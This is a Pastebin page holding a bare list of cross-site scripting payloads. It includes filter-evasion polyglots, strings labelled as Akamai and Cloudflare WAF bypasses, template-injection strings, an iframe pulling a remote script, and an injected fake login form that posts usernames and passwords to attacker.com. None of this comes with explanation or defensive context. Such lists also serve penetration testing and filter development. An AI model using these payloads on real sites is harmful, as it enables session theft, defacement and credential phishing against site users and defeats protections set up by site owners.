Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- XSS
- %0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
- -->"/><sCript<deTailS open x=">" ontoggle=(co\u006efirm)''>
- <a href="javascript	:alert(1)">Click Me</a>
- </script><script/%0A<k>alert`1`//
- ["</script><script>alert(document.domain);</script>"]=123
- "></script><script>prompt(" Test", document.domain);</script>
- <script>alert(document.cookie);</script>
- -TEST<br><br><center><font color="red">Tested<br><br><img src=x onclick=alert(1)><br><br><img src=x onerror=prompt(1)>
- {{constructor.constructor('alert(document.domain)')()}}
- "'--!><Script /K/>confirm(1)</Script /K/>#
- <a href=[javascript&':alert(1)']>test
- <img src=x onerror=prompt(1)>
- "e;><img src=x onerror=confirm(1);>
- http://x.com/"onmouseover="alert(document.domain)
- <script%0a>alert(1)</script%0a>
- <iframe/src=//l❤️.io>
- <img/src=//🤣.io>
- <scrip❤t>prompt(1)</scrip❤t>
- <"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)//>
- <a title="'test" ismap="alert xss" yyy="test" ' href="http://evil.com">Click Me</a><br><br>
- <script>a ="</script><img src=p onerror='prompt(1)'/>"
- "><svg0%aonload="alert(document.domain)>
- "><svg/onload="alert(document.domain)>
- x<a href=javascript:alert(1),alert(2)>X</a>
- <%5X%2XOn%5Xointerup=%7Xrompt(1)>
- <Svg/Onload=top%5B"al"%2B"ert%5D(1)//
- {{this.constructor.constructor('alert("foo")')()}}
- test'-Function`self['a'\x2b'l'\x2b'e'\x2b'r'\x2b't']\x281\x29```-'
- <iframe SrcDoc="<Script Src=https://darkgent.xss.ht></Script">
- 1<!--><Svg OnLoad=(confirm)(1)-->
- All-in-One Polyglot:
- '"*/onmouseover=(print)?.()><sVg/oNload='1>(_=prompt,_`{{7*7}}`)'></sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror='alert`1`%27'src>xhzeem%22%3E%3CSvg/\u0022\u003e\u003csVg/\x22\x3e\x3csVg/"><svG/onload=alert`2`//
- Akamai Waf Bypass
- <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
- <marquee loop=1 width=0 onfinish=pr\u006fmpt("xss_by_Y000")>Y000</marquee>
- javascript:new%20Function`al\ert\`1\``;
- <noscript><p title='</noscript><svg onload=prompt(1)>'>
- Cloudflare bypass :
- <img src=x Onerror="top[8680439..toString(30)](1)">
- "><svg onload=alert%26%230000000040"1")>
- {` <body \< onscroll =1(=prompt,(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
- HTML Injection
- "><marquee><h1>XSS Attack</marquee></h1>
- <center><img src="https://anoncyberteam.or.id/images/act.png" width="500" height="500"></center><font color="red" size="100px" face="courier new">XSS By Mr.Colded%85
- <form method='POST' action='http://attacker.com/capture.php' id="login-form">
- Username :<br><input type='text' name='username' value=''>
- <br>
- Password :<br><input type='password' name='password' value=''>
- <input type='submit' value='submit'>
- </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement